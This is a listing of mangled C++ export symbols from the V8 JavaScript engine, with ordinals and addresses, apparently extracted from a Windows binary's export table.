                                                                                                                                                                                                                                    ?ClobbersDoubleRegisters@Instruction@compiler@internal@v8@@QEBA_NXZ44220x14057ea30
                                                                                                                                                                                                                                    ?ClobbersRegisters@Instruction@compiler@internal@v8@@QEBA_NXZ44230x14057ea30
                                                                                                                                                                                                                                    ?ClobbersTemps@Instruction@compiler@internal@v8@@QEBA_NXZ44240x14057ea30
                                                                                                                                                                                                                                    ?Clone@Node@compiler@internal@v8@@SAPEAV1234@PEAVZone@34@IPEBV1234@@Z44250x14102a690
                                                                                                                                                                                                                                    ?Clone@Object@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ44260x140c7c090
                                                                                                                                                                                                                                    ?CloneNode@Graph@compiler@internal@v8@@QEAAPEAVNode@234@PEBV5234@@Z44270x1410dd850
                                                                                                                                                                                                                                    ?CloneObject@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@HH@Z44280x140a5ae60
                                                                                                                                                                                                                                    ?CloneObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@H@Z44290x1410c2db0
                                                                                                                                                                                                                                    ?CloneScript@Factory@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@23@V423@@Z44300x140b21dc0
                                                                                                                                                                                                                                    ?CloneSharedFunctionInfo@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSharedFunctionInfo@internal@v8@@@23@V423@@Z44310x140b346f0
                                                                                                                                                                                                                                    ?CloneSharedFunctionInfo@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSharedFunctionInfo@internal@v8@@@23@V423@@Z44320x140b347a0
                                                                                                                                                                                                                                    ?Close@AllowCompilation@internal@v8@@SAXPEAVIsolate@23@_N@Z44330x140554000
                                                                                                                                                                                                                                    ?Close@AllowDeoptimization@internal@v8@@SAXPEAVIsolate@23@_N@Z44340x1405541b0
                                                                                                                                                                                                                                    ?Close@AllowExceptions@internal@v8@@SAXPEAVIsolate@23@_N@Z44350x140554f90
                                                                                                                                                                                                                                    ?Close@AllowJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z44360x1405548e0
                                                                                                                                                                                                                                    ?Close@DisallowCompilation@internal@v8@@SAXPEAVIsolate@23@_N@Z44370x140554000
                                                                                                                                                                                                                                    ?Close@DisallowDeoptimization@internal@v8@@SAXPEAVIsolate@23@_N@Z44380x1405541b0
                                                                                                                                                                                                                                    ?Close@DisallowExceptions@internal@v8@@SAXPEAVIsolate@23@_N@Z44390x140554f90
                                                                                                                                                                                                                                    ?Close@DisallowJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z44400x1405548e0
                                                                                                                                                                                                                                    ?Close@DumpOnJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z44410x1405548f0
                                                                                                                                                                                                                                    ?Close@NoDumpOnJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z44420x1405548f0
                                                                                                                                                                                                                                    ?Close@NoThrowOnJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z44430x140554900
                                                                                                                                                                                                                                    ?Close@ThrowOnJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z44440x140554900
                                                                                                                                                                                                                                    ?CloseAndMakeIterable@LocalAllocationBuffer@internal@v8@@QEAA?AVLinearAllocationArea@23@XZ44450x140a9beb0
                                                                                                                                                                                                                                    ?CloseMainThreadScope@LocalHandleScope@internal@v8@@CAXPEAVLocalHeap@23@PEA_K1@Z44460x140b4ac60
                                                                                                                                                                                                                                    ?CloseTemplateLiteral@Parser@internal@v8@@AEAAPEAVExpression@23@PEAPEAVTemplateLiteral@123@HPEAV423@@Z44470x1408ba820
                                                                                                                                                                                                                                    ?Cmp@MacroAssembler@internal@v8@@QEAAXVOperand@23@V?$Handle@VObject@internal@v8@@@23@@Z44480x1405f56e0
                                                                                                                                                                                                                                    ?Cmp@MacroAssembler@internal@v8@@QEAAXVRegister@23@V?$Handle@VObject@internal@v8@@@23@@Z44490x1405f57b0
                                                                                                                                                                                                                                    ?Cmp@TurboAssembler@internal@v8@@QEAAXVOperand@23@VSmi@23@@Z44500x1405f5850
                                                                                                                                                                                                                                    ?Cmp@TurboAssembler@internal@v8@@QEAAXVRegister@23@H@Z44510x1405f58e0
                                                                                                                                                                                                                                    ?Cmp@TurboAssembler@internal@v8@@QEAAXVRegister@23@VSmi@23@@Z44520x1405f5930
                                                                                                                                                                                                                                    ?CmpInstanceType@MacroAssembler@internal@v8@@QEAAXVRegister@23@W4InstanceType@23@@Z44530x1405f59b0
                                                                                                                                                                                                                                    ?CmpInstanceTypeRange@MacroAssembler@internal@v8@@QEAAXVRegister@23@0W4InstanceType@23@1@Z44540x1405f5a20
                                                                                                                                                                                                                                    ?CmpObjectType@MacroAssembler@internal@v8@@QEAAXVRegister@23@W4InstanceType@23@0@Z44550x1405f5ac0
                                                                                                                                                                                                                                    ?Cmpeqsd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z44560x1405f5b10
                                                                                                                                                                                                                                    ?Cmpeqss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z44570x1405f5b80
                                                                                                                                                                                                                                    ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@PEBVWasmCode@wasm@23@V?$Vector@$$CBD@base@3@PEBDHH@Z44580x140a0f2e0
                                                                                                                                                                                                                                    ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@PEBD@Z44590x140a0f470
                                                                                                                                                                                                                                    ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z44600x140a0f520
                                                                                                                                                                                                                                    ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z44610x140a0f580
                                                                                                                                                                                                                                    ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@HH@Z44620x140a0f660
                                                                                                                                                                                                                                    ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@PEBVWasmCode@wasm@23@V?$Vector@$$CBD@base@3@PEBDHH@Z44630x140862480
                                                                                                                                                                                                                                    ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@PEBD@Z44640x140862610
                                                                                                                                                                                                                                    ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z44650x140862760
                                                                                                                                                                                                                                    ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z44660x1408628b0
                                                                                                                                                                                                                                    ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@HH@Z44670x140862ae0
                                                                                                                                                                                                                                    ?CodeDeoptEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VCode@internal@v8@@@23@W4DeoptimizeKind@23@_KH@Z44680x1400971a0
                                                                                                                                                                                                                                    ?CodeDeoptEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VCode@internal@v8@@@23@W4DeoptimizeKind@23@_KH@Z44690x140863700
                                                                                                                                                                                                                                    ?CodeDependencyChangeEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@PEBD@Z44700x1400971a0
                                                                                                                                                                                                                                    ?CodeDependencyChangeEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@PEBD@Z44710x1400971a0
                                                                                                                                                                                                                                    ?CodeDisableOptEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z44720x1408637c0
                                                                                                                                                                                                                                    ?CodeEntry@TurboAssembler@internal@v8@@QEAAXXZ44730x1400971a0
                                                                                                                                                                                                                                    ?CodeEventHandler@ProfilerCodeObserver@internal@v8@@UEAAXAEBVCodeEventsContainer@23@@Z44740x14087b090
                                                                                                                                                                                                                                    ?CodeEventHandler@ProfilerEventsProcessor@internal@v8@@UEAAXAEBVCodeEventsContainer@23@@Z44750x14087b0b0
                                                                                                                                                                                                                                    ?CodeEventHandlerInternal@ProfilerCodeObserver@internal@v8@@AEAAXAEBVCodeEventsContainer@23@@Z44760x14087b160
                                                                                                                                                                                                                                    ?CodeMoveEvent@ProfilerListener@internal@v8@@UEAAXVAbstractCode@23@0@Z44770x140863850
                                                                                                                                                                                                                                    ?CodeMovingGCEvent@CodeEventLogger@internal@v8@@UEAAXXZ44780x1400971a0
                                                                                                                                                                                                                                    ?CodeMovingGCEvent@ProfilerListener@internal@v8@@UEAAXXZ44790x1400971a0
                                                                                                                                                                                                                                    ?CodeObject@TurboAssemblerBase@internal@v8@@QEBA?AV?$Handle@VHeapObject@internal@v8@@@23@XZ44800x140559750
                                                                                                                                                                                                                                    ?CodePageGuardSize@MemoryChunkLayout@internal@v8@@SA_KXZ44810x140abc450
                                                                                                                                                                                                                                    ?CodePageGuardStartOffset@MemoryChunkLayout@internal@v8@@SA_KXZ44820x140abc460
                                                                                                                                                                                                                                    ?CodeSweepEvent@ProfilerListener@internal@v8@@QEAAXXZ44830x140863900
                                                                                                                                                                                                                                    ?CodeTargetAlign@Assembler@internal@v8@@QEAAXXZ44840x1405fdf10
                                                                                                                                                                                                                                    ?CollapseNaryExpression@Parser@internal@v8@@AEAA_NPEAPEAVExpression@23@PEAV423@W4Value@Token@23@HAEBUSourceRange@23@@Z44850x1408baa20
                                                                                                                                                                                                                                    ?Collect@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VString@internal@v8@@@23@H@Z44860x1409a9450
                                                                                                                                                                                                                                    ?Collect@TypeProfile@debug@v8@@SA?AV123@PEAVIsolate@3@@Z44870x140bc8bb0
                                                                                                                                                                                                                                    ?CollectAllAvailableGarbage@Heap@internal@v8@@QEAAXW4GarbageCollectionReason@23@@Z44880x140afffc0
                                                                                                                                                                                                                                    ?CollectAllGarbage@Heap@internal@v8@@QEAAXHW4GarbageCollectionReason@23@W4GCCallbackFlags@3@@Z44890x140b004c0
                                                                                                                                                                                                                                    ?CollectArrayAndObjectPrototypes@JSHeapBroker@compiler@internal@v8@@AEAAXXZ44900x1410b6a70
                                                                                                                                                                                                                                    ?CollectBestEffort@Coverage@debug@v8@@SA?AV123@PEAVIsolate@3@@Z44910x140bc8c60
                                                                                                                                                                                                                                    ?CollectControlProjections@NodeProperties@compiler@internal@v8@@SAXPEAVNode@234@PEAPEAV5234@_K@Z44920x141034140
                                                                                                                                                                                                                                    ?CollectCustomSpaceStatisticsAtLastGC@CppHeap@internal@v8@@QEAAXV?$vector@UCustomSpaceIndex@cppgc@@V?$allocator@UCustomSpaceIndex@cppgc@@@std@@@std@@V?$unique_ptr@VCustomSpaceStatisticsReceiver@v8@@U?$default_delete@VCustomSpaceStatisticsReceiver@v8@@@std@@@5@@Z44930x140b3eca0
                                                                                                                                                                                                                                    ?CollectCustomSpaceStatisticsAtLastGC@CppHeap@v8@@QEAAXV?$vector@UCustomSpaceIndex@cppgc@@V?$allocator@UCustomSpaceIndex@cppgc@@@std@@@std@@V?$unique_ptr@VCustomSpaceStatisticsReceiver@v8@@U?$default_delete@VCustomSpaceStatisticsReceiver@v8@@@std@@@4@@Z44940x140b3ef40
                                                                                                                                                                                                                                    ?CollectDeoptInfo@ProfileNode@internal@v8@@QEAAXPEAVCodeEntry@23@@Z44950x1408660a0
                                                                                                                                                                                                                                    ?CollectGarbage@GCInvoker@internal@cppgc@@UEAAXUConfig@GarbageCollector@23@@Z44960x14051ba80
                                                                                                                                                                                                                                    ?CollectGarbage@Heap@internal@cppgc@@UEAAXUConfig@GarbageCollector@23@@Z44970x140517770
                                                                                                                                                                                                                                    ?CollectGarbage@Heap@internal@v8@@QEAA_NW4AllocationSpace@23@W4GarbageCollectionReason@23@W4GCCallbackFlags@3@@Z44980x140b00710
                                                                                                                                                                                                                                    ?CollectGarbageForTesting@CppHeap@internal@v8@@QEAAXW4CollectionType@MarkingConfig@MarkerBase@2cppgc@@W4EmbedderStackState@7@@Z44990x140b3f020
                                                                                                                                                                                                                                    ?CollectGarbageForTesting@CppHeap@v8@@QEAAXW4EmbedderStackState@cppgc@@@Z45000x140b3f120
                                                                                                                                                                                                                                    ?CollectGarbageInYoungGenerationForTesting@CppHeap@v8@@QEAAXW4EmbedderStackState@cppgc@@@Z45010x140b3f140
                                                                                                                                                                                                                                    ?CollectGlobalObjectsTags@V8HeapExplorer@internal@v8@@QEAAXXZ45020x14086bdf0
                                                                                                                                                                                                                                    ?CollectNonLocals@DeclarationScope@internal@v8@@QEAA?AV?$Handle@VStringSet@internal@v8@@@23@PEAVIsolate@23@V423@@Z45030x140c63ab0
                                                                                                                                                                                                                                    ?CollectNonLocals@Scope@internal@v8@@AEAAXPEAVDeclarationScope@23@PEAVIsolate@23@PEAV?$Handle@VStringSet@internal@v8@@@23@@Z45040x140c63af0
                                                                                                                                                                                                                                    ?CollectPrecise@Coverage@debug@v8@@SA?AV123@PEAVIsolate@3@@Z45050x140bc8cd0
                                                                                                                                                                                                                                    ?CollectSample@CpuProfiler@internal@v8@@QEAAXXZ45060x14087b430
                                                                                                                                                                                                                                    ?CollectSample@CpuProfiler@internal@v8@@SAXPEAVIsolate@23@@Z45070x14087b450
                                                                                                                                                                                                                                    ?CollectSample@CpuProfiler@v8@@SAXPEAVIsolate@2@@Z45080x140c7c100
                                                                                                                                                                                                                                    ?CollectSharedGarbage@Heap@internal@v8@@QEAAXW4GarbageCollectionReason@23@@Z45090x140b01710
                                                                                                                                                                                                                                    ?CollectSourcePositions@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z45100x140c00ad0
                                                                                                                                                                                                                                    ?CollectSourcePositionsForAllBytecodeArrays@Isolate@internal@v8@@QEAAXXZ45110x140b667b0
                                                                                                                                                                                                                                    ?CollectStatistics@CppHeap@v8@@QEAA?AUHeapStatistics@cppgc@@W4DetailLevel@34@@Z45120x140b3f160
                                                                                                                                                                                                                                    ?CollectStatistics@FreeList@internal@cppgc@@QEAAXAEAUFreeListStatistics@HeapStatistics@3@@Z45130x14051cf30
                                                                                                                                                                                                                                    ?CollectStatistics@HeapBase@internal@cppgc@@QEAA?AUHeapStatistics@3@W4DetailLevel@43@@Z45140x14051b2e0
                                                                                                                                                                                                                                    ?CollectTypeProfile@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@H@Z45150x140a5b030
                                                                                                                                                                                                                                    ?CollectValueProjections@NodeProperties@compiler@internal@v8@@SAXPEAVNode@234@PEAPEAV5234@_K@Z45160x141034290
                                                                                                                                                                                                                                    ?ColumnOffset@ScriptOrigin@v8@@QEBAHXZ45170x140097a30
                                                                                                                                                                                                                                    ?CombineSpeedsInBytesPerMillisecond@GCTracer@internal@v8@@SANNN@Z45180x140b1a300
                                                                                                                                                                                                                                    ?CombineSurrogatePair@Scanner@internal@v8@@AEAA_NXZ45190x14053e7b0
                                                                                                                                                                                                                                    ?CombinedMarkCompactSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEAANXZ45200x140b1a320
                                                                                                                                                                                                                                    ?Comment@CodeAssembler@compiler@internal@v8@@QEAAXPEBD@Z45210x1400971a0
                                                                                                                                                                                                                                    ?Comment@CodeAssembler@compiler@internal@v8@@QEAAXV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z45220x140559d10
                                                                                                                                                                                                                                    ?Comment@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBD@Z45230x1410517d0
                                                                                                                                                                                                                                    ?Comment@RawMachineAssembler@compiler@internal@v8@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z45240x1412187a0
                                                                                                                                                                                                                                    ?CommentForOffHeapTrampoline@TurboAssemblerBase@internal@v8@@QEAA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBDW4Builtin@23@@Z45250x140559760
                                                                                                                                                                                                                                    ?Commit@CompilationDependencies@compiler@internal@v8@@QEAA_NV?$Handle@VCode@internal@v8@@@34@@Z45260x1410bc1d0
                                                                                                                                                                                                                                    ?Commit@WasmCodeManager@wasm@internal@v8@@AEAAXVAddressRegion@base@4@@Z45270x14065ff00
                                                                                                                                                                                                                                    ?CommitFromSpaceIfNeeded@NewSpace@internal@v8@@QEAA_NXZ45280x14053e850
                                                                                                                                                                                                                                    ?CommitPageSize@BoundedPageAllocator@base@v8@@UEAA_KXZ45290x140097b80
                                                                                                                                                                                                                                    ?CommitPageSize@OS@base@v8@@CA_KXZ45300x140ff3770
                                                                                                                                                                                                                                    ?CommitPageSize@PageAllocator@base@v8@@UEAA_KXZ45310x140097b70
                                                                                                                                                                                                                                    ?CommitPageSize@internal@v8@@YA_KXZ45320x1407bc900
                                                                                                                                                                                                                                    ?CommitReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KW4OperandSize@234@VSmi@34@@Z45330x140a35030
                                                                                                                                                                                                                                    ?CommitSpillMoves@TopLevelLiveRange@compiler@internal@v8@@QEAAXPEAVTopTierRegisterAllocationData@234@AEBVInstructionOperand@234@@Z45340x14110ace0
                                                                                                                                                                                                                                    ?CommittedMemory@BaseSpace@internal@v8@@UEBA_KXZ45350x14053e880
                                                                                                                                                                                                                                    ?CommittedMemory@NewSpace@internal@v8@@UEBA_KXZ45360x14053e890
                                                                                                                                                                                                                                    ?CommittedPhysicalMemory@LargeObjectSpace@internal@v8@@UEBA_KXZ45370x140af3c80
                                                                                                                                                                                                                                    ?CommittedPhysicalMemory@MemoryChunk@internal@v8@@QEBA_KXZ45380x140abbe20
                                                                                                                                                                                                                                    ?CommittedPhysicalMemory@NewSpace@internal@v8@@UEBA_KXZ45390x140ab7980
                                                                                                                                                                                                                                    ?CommittedPhysicalMemory@PagedSpace@internal@v8@@UEBA_KXZ45400x140aac5a0
                                                                                                                                                                                                                                    ?CommittedPhysicalMemory@ReadOnlySpace@internal@v8@@UEBA_KXZ45410x140aaa2a0
                                                                                                                                                                                                                                    ?Compact@OSROptimizedCodeCache@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VNativeContext@internal@v8@@@23@@Z45420x1408f4f30
                                                                                                                                                                                                                                    ?Compact@PrototypeUsers@internal@v8@@SA?AVWeakArrayList@23@V?$Handle@VWeakArrayList@internal@v8@@@23@PEAVHeap@23@P6AXVHeapObject@23@HH@ZW4AllocationType@23@@Z45430x1409095e0
                                                                                                                                                                                                                                    ?Compact@WeakArrayList@internal@v8@@QEAAXPEAVIsolate@23@@Z45440x140909800
                                                                                                                                                                                                                                    ?CompactSpacesIfEnabled@Compactor@internal@cppgc@@QEAA?AW4CompactableSpaceHandling@SweepingConfig@Sweeper@23@XZ45450x14051ee50
                                                                                                                                                                                                                                    ?CompactWeakArrayList@Factory@internal@v8@@QEAA?AV?$Handle@VWeakArrayList@internal@v8@@@23@V423@HW4AllocationType@23@@Z45460x140b221e0
                                                                                                                                                                                                                                    ?CompactionSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ45470x140b1a3d0
                                                                                                                                                                                                                                    ?Compare@Bignum@base@v8@@SAHAEBV123@0@Z45480x141004530
                                                                                                                                                                                                                                    ?Compare@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z45490x14057ea40
                                                                                                                                                                                                                                    ?Compare@Object@internal@v8@@SA?AV?$Maybe@W4ComparisonResult@internal@v8@@@3@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@1@Z45500x140909940
                                                                                                                                                                                                                                    ?CompareCanonicalized@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z45510x14057ea50
                                                                                                                                                                                                                                    ?CompareExchangeStatus@Cancelable@internal@v8@@AEAA_NW4Status@123@0PEAW44123@@Z45520x14053e8d0
                                                                                                                                                                                                                                    ?CompareMaps@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$ZoneHandleSet@VMap@internal@v8@@@34@@Z45530x1410d71d0
                                                                                                                                                                                                                                    ?CompareNil@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@W4NilValue@1234@@Z45540x140a5b180
                                                                                                                                                                                                                                    ?CompareNull@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ45550x140a5b1a0
                                                                                                                                                                                                                                    ?CompareOperation@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@VRegister@234@H@Z45560x140a5b2d0
                                                                                                                                                                                                                                    ?CompareRange@MacroAssembler@internal@v8@@QEAAXVRegister@23@II@Z45570x1405f5bd0
                                                                                                                                                                                                                                    ?CompareReference@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z45580x140a5bd30
                                                                                                                                                                                                                                    ?CompareRoot@TurboAssembler@internal@v8@@QEAAXVOperand@23@W4RootIndex@23@@Z45590x1405f5d30
                                                                                                                                                                                                                                    ?CompareRoot@TurboAssembler@internal@v8@@QEAAXVRegister@23@W4RootIndex@23@@Z45600x1405f5da0
                                                                                                                                                                                                                                    ?CompareStrings@Intl@internal@v8@@SAHPEAVIsolate@23@AEBVCollator@icu_71@@V?$Handle@VString@internal@v8@@@23@2W4CompareStringsOptions@123@@Z45610x14099e200
                                                                                                                                                                                                                                    ?CompareStrings@LiveEdit@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@1PEAV?$vector@USourceChangeRange@internal@v8@@V?$allocator@USourceChangeRange@internal@v8@@@std@@@std@@@Z45620x140bb2700
                                                                                                                                                                                                                                    ?CompareToDouble@BigInt@internal@v8@@SA?AW4ComparisonResult@23@V?$Handle@VBigInt@internal@v8@@@23@N@Z45630x140a02f40
                                                                                                                                                                                                                                    ?CompareTypeOf@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4LiteralFlag@TestTypeOfFlags@234@@Z45640x140a5bee0
                                                                                                                                                                                                                                    ?CompareUndefined@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ45650x140a5c030
                                                                                                                                                                                                                                    ?CompareUndetectable@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ45660x140a5c160
                                                                                                                                                                                                                                    ?Compile@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@W4ClearExceptionFlag@123@PEAVIsCompiledScope@23@@Z45670x140c010d0
                                                                                                                                                                                                                                    ?Compile@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@W4ClearExceptionFlag@123@PEAVIsCompiledScope@23@W4CreateSourcePositions@23@@Z45680x140c01410
                                                                                                                                                                                                                                    ?Compile@Script@v8@@SA?AV?$MaybeLocal@VScript@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VString@v8@@@2@PEAVScriptOrigin@2@@Z45690x140c7c110
                                                                                                                                                                                                                                    ?Compile@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VScript@v8@@@2@V?$Local@VContext@v8@@@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z45700x140c7c1a0
                                                                                                                                                                                                                                    ?Compile@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VScript@v8@@@2@V?$Local@VContext@v8@@@2@PEAVStreamedSource@12@V?$Local@VString@v8@@@2@AEBVScriptOrigin@2@@Z45710x140c7c2a0
                                                                                                                                                                                                                                    ?Compile@WasmModuleObject@v8@@SA?AV?$MaybeLocal@VWasmModuleObject@v8@@@2@PEAVIsolate@2@V?$MemorySpan@$$CBE@2@@Z45720x140c7c770
                                                                                                                                                                                                                                    ?CompileBaseline@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@W4ClearExceptionFlag@123@PEAVIsCompiledScope@23@@Z45730x140c01cd0
                                                                                                                                                                                                                                    ?CompileCWasmEntry@compiler@internal@v8@@YA?AV?$Handle@VCode@internal@v8@@@23@PEAVIsolate@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEBUWasmModule@wasm@23@@Z45740x14107eb00
                                                                                                                                                                                                                                    ?CompileError@ErrorThrower@wasm@internal@v8@@QEAAXPEBDZZ45750x14061ff10
                                                                                                                                                                                                                                    ?CompileError_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ45760x14053e8f0
                                                                                                                                                                                                                                    ?CompileError_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ45770x1407df4f0
                                                                                                                                                                                                                                    ?CompileFailed@ErrorThrower@wasm@internal@v8@@QEAAXAEBVWasmError@234@@Z45780x14061d220
                                                                                                                                                                                                                                    ?CompileForLiveEdit@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVParseInfo@23@V?$Handle@VScript@internal@v8@@@23@PEAVIsolate@23@@Z45790x140c01dc0
                                                                                                                                                                                                                                    ?CompileForTesting@RegExp@internal@v8@@SA_NPEAVIsolate@23@PEAVZone@23@PEAURegExpCompileData@23@V?$Flags@W4RegExpFlag@internal@v8@@H@base@3@V?$Handle@VString@internal@v8@@@23@4_N@Z45800x140829a70
                                                                                                                                                                                                                                    ?CompileFunction@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VFunction@v8@@@2@V?$Local@VContext@v8@@@2@PEAVSource@12@_KQEAV?$Local@VString@v8@@@2@2QEAV?$Local@VObject@v8@@@2@W4CompileOptions@12@W4NoCacheReason@12@@Z45810x140c7c900
                                                                                                                                                                                                                                    ?CompileFunction@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@PEAVNativeModule@234@IW4ExecutionTier@234@@Z45820x14064b460
                                                                                                                                                                                                                                    ?CompileFunctionInContext@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VFunction@v8@@@2@V?$Local@VContext@v8@@@2@PEAVSource@12@_KQEAV?$Local@VString@v8@@@2@2QEAV?$Local@VObject@v8@@@2@W4CompileOptions@12@W4NoCacheReason@12@PEAV?$Local@VScriptOrModule@v8@@@2@@Z45830x140c7c960
                                                                                                                                                                                                                                    ?CompileFunctionInternal@ScriptCompiler@v8@@CA?AV?$MaybeLocal@VFunction@v8@@@2@V?$Local@VContext@v8@@@2@PEAVSource@12@_KQEAV?$Local@VString@v8@@@2@2QEAV?$Local@VObject@v8@@@2@W4CompileOptions@12@W4NoCacheReason@12@PEAV?$Local@VScriptOrModule@v8@@@2@@Z45840x140c7c9d0
                                                                                                                                                                                                                                    ?CompileImportWrapper@wasm@internal@v8@@YAPEAVWasmCode@123@PEAVNativeModule@123@PEAVCounters@23@W4WasmImportCallKind@compiler@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@HW4Suspend@123@PEAVModificationScope@WasmImportWrapperCache@123@@Z45850x14068e060
                                                                                                                                                                                                                                    ?CompileJSToWasmWrapper@JSToWasmWrapperCompilationUnit@wasm@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@34@PEAVIsolate@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@PEBUWasmModule@234@_N@Z45860x1406bc1c0
                                                                                                                                                                                                                                    ?CompileJsToWasmWrappers@wasm@internal@v8@@YAXPEAVIsolate@23@PEBUWasmModule@123@PEAV?$Handle@VFixedArray@internal@v8@@@23@@Z45870x14068e280
                                                                                                                                                                                                                                    ?CompileMaglev@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@W4ConcurrencyMode@23@PEAVIsCompiledScope@23@@Z45880x140098380
                                                                                                                                                                                                                                    ?CompileModule@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VModule@v8@@@2@PEAVIsolate@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z45890x140c7d4a0
                                                                                                                                                                                                                                    ?CompileModule@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VModule@v8@@@2@V?$Local@VContext@v8@@@2@PEAVStreamedSource@12@V?$Local@VString@v8@@@2@AEBVScriptOrigin@2@@Z45900x140c7d5f0
                                                                                                                                                                                                                                    ?CompileNext@OptimizingCompileDispatcher@internal@v8@@AEAAXPEAVTurbofanCompilationJob@23@PEAVLocalIsolate@23@@Z45910x140bd7d50
